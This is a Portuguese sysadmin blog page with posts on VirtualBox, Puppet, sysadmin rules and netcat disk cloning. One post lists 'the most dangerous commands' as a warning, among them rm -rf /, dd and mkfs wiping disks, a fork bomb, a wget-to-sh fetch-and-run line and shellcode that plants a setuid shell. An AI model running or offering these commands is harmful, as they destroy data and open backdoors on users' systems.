VBOXMANAGE – Administração e Criacao do Virtual Box


Segue texto como criar maquinas virtuais no Virtual Box através de linha de comando.

A finalidade é a otimização da resposta e agilidade na criação de múltiplas maquinas virtuais, através da linha de comando podemos realizar a construção do ambiente virtual através de um arquivo de lotes (BAT, Shell script e etc). Além dessa reposta também podemos melhor gerenciar os snapshots e tos as outras demais funções que o Virtual Box possui.

VBOXMANAGE

Continuar a ler

Os comandos mais perigosos do mundo


Comando abaixo são usado no console ou em um terminal Linux , Se vc quiser testar vai em frente , mas não me pertube, sua conta em risco.  

Qualquer um desses comandos irá apagar tudo que estiver no seu diretório raiz:
01) sudo rm -rf /
02) rm -rf .*
03) dd if=/dev/zero of=/dev/sda
04) mkfs.ext3 /dev/hda
05) whatever > /dev/hda
06) cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
07) find -type f -mtime +30 -exec mv {} /dev/null \;
08) mv ~ /dev/null
09) mv / /dev/null

10) O comando abaixo pode provocar o kernel panic (similar à tela azul da morte) ou congelará o sistema:
==> dd if=/dev/random of=/dev/port

11) Um comando que mais parece aquelas carinhas de chat, mas que também é conhecido como Bomba Fork:
==> :(){:|:&};:

12) Este faz o mesmo que “rm-rf /” (a diferença é que está em código decimal):
char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

13) Este comando irá mover o diretório home para um lugar que realmente não existe (/dev/null é o buraco negro do Linux):
==> mv /home/username/* /dev/null

14) Este fará download de um script shell e executá-lo quando o download terminar ( a “|” = juntar, executar na sequência):
==> wget sumber_tak_terpercaya -O- | sh

15) Este irá impedi-lo de executar comandos com privilégios de root (outra variação do comando rm -f /):
==> rm -f /usr/bin/sudo;rm -f /bin/su

fonte: http://www.tecmundo.com.br/disco-rigido/4005-aprenda-a-formatar-e-deixar-o-hd-redondinho-.htm

Puppet – Instalação e configuração no client server


Segue Vídeo de uma instalação e configuração de puppet client abaixo uma pequena descrição

Puppetmasterd é o servidor central da solução.

Puppetd é o cliente da solução que busca o catálogo compilado e reporta informações do sistema para servidor.

Puppet é um aplicativo, em especial, para teste do catálogo

Manifest é uma declaração de expressões para controlar o Puppet. É uma linguagem de domínio específica.

fonte: http://castix.wordpress.com/2009/02/28/server-configuration-with-puppet/

Leia também :

Engenharia de Software para Web

Três Regras Sysadmin que você não pode quebrar

Web Hosting – Instalando Apache e WordPress

Três Regras Sysadmin que você não pode quebrar


Segue um artigo que achei interessante e traduzi do http://www.thegeekstuff.com , se houver algum erro de tradução é só avisar. Lógico que o Sysadmin é muito mais que isso.

Enquanto hábitos são bons, às vezes as regras pode até ser melhor, especialmente no mundo sysadmin, quando manuseamos um ambiente de produção.

 # Regra n º 1: Backup de Tudo (e validar o backup feito )

 Sysadmin experiente sabe que sistema de produção irá falhar um dia, não importa o quão sejamos proativo. A melhor maneira de estar preparado para essa situação é ter um backup válido. Se não temos backup de nossos sistemas críticos, devemos planejar com urgência. Durante o planejamento para um backup, os seguintes fatores que devemos ter em mente:

  • Qual software (ou script personalizado?) que gostariamos de usar para fazer um backup?
    Se temos espaço em disco suficiente para manter o backup?
    Quantas vezes gostariamos de rotacionar os backups?
    Além do backup completo, podemos também precisar de algum backup incremental ou diferencial?
    Como gostariamos de executar o backup? Usando crontab ou alguns outros agendamentos

Se você é um sysadmin e não quer seguir essa regra de ouro #1 (ou gosta de quebrar esta regra), você deve considerar seriamente desistir o trabalho de sysadmin e se tornar um desenvolvedor.

# Regra n º 2: Dominar linha de comando (evitar a interface do usuário, se possível)

Este não é uma tarefa simples em um servidor Unix / Linux, na qual podemos executar alguma linha de comando . Existam alguns interface de usuário para fazer uma tarefa sysadmin mais fácil, devemos usar sempre a linha de comando.

Se você é um sysadmin Linux, você deve dominar a linha de comando.

Em qualquer sistema, se quisermos ser muito fluente e produtivo, devemos dominar a linha de comando. A principal diferença entre um sysadmin windows e sysadmin Linux é o – GUI vs linha de comando.

Mesmo quando temos uma interface de usuário para fazer determinada tarefa, devemos ainda preferir a linha de comando, para podermos entender como um determinado serviço funciona.

Se você é Unix / Linux sysadmin e não querem seguir essa regra, provavelmente há um desejo profundo dentro de você para se tornar um sysadmin Windows.

# Regra n º 3: Automatizar Tudo (e tornar-se preguiçoso)

Um Sysadmin preguiçoso é a melhor sysadmin.

Não há nem mesmo um único sysadmin , que gosta de quebrar essa regra. Isso pode ter algo a ver com a parte preguiçoso. Tome alguns minutos para pensar e listar todas as tarefas de rotina que você pode fazer diariamente, semanalmente ou mensalmente. Depois de ter essa lista, descubra como você pode automatizar. O melhor sysadmin normalmente não gosta de ser ocupado. Ele prefere estar relaxado e deixe o sistema fazer o trabalho para ele.

 Existem regras que você acha que um sysadmin não deve quebrar?

 fonte : http://www.thegeekstuff.com/2010/07/three-sysadmin-rules/

Leia Também : Usando Twitter para monitorar Linux Server!

Clonando com Linux


Este post pode ser util para quem gosta de efetuar um  “ghosting”  de um computador com Linux para outro (ou simplesmente fazer um backup completo de um desktop / servidor). Você pode personalizar um ambiente de trabalho do jeito que você gosta e é necessário executar para outras PCs ou simplesmente efetuar um simples backup de um servidor ou desktop para outra máquina ou até mesmo para um arquivo de imagem.

A ferramenta principal  é netcat,  existe outros que podem ser pesquisados

Maquina Alvo:

Iniciar netcat para escutar a porta 30- # nc -l -p <portnumber> | dd of=/dev/sda (assumindo que o disco rígido é sda e não hda)

# nc -l -p 30 | dd of=/dev/sda

Maquina de Origem:

Descarregar o conteúdo do disco para o PC alvo : #dd if=/dev/sda | nc <ipaddresstarget> <portnumber>

# dd if=/dev/sda | nc 192.168.0.20 30

Verificar que o tráfego está fluindo,  ir para outro terminal (ALT/F2) e carregar os dados tcp na NIC (assumindo que é eth0):

tcpdump -tnli eth0 port 30

Se você quer apenas uma imagem de backup que você poderia mudar o resultado acima do target para:

# nc -l -p 30 | dd of=mybackup.img

Naturalmente, o PC alvo / disco não pode ser menor do que o original

fonte : http://www.howtoforge.com/ghosting-the-machine

tradução Aldo Silva (se acharem algum erro de tradução, por favor me avise)

leia também : Bloqueando solicitações de ping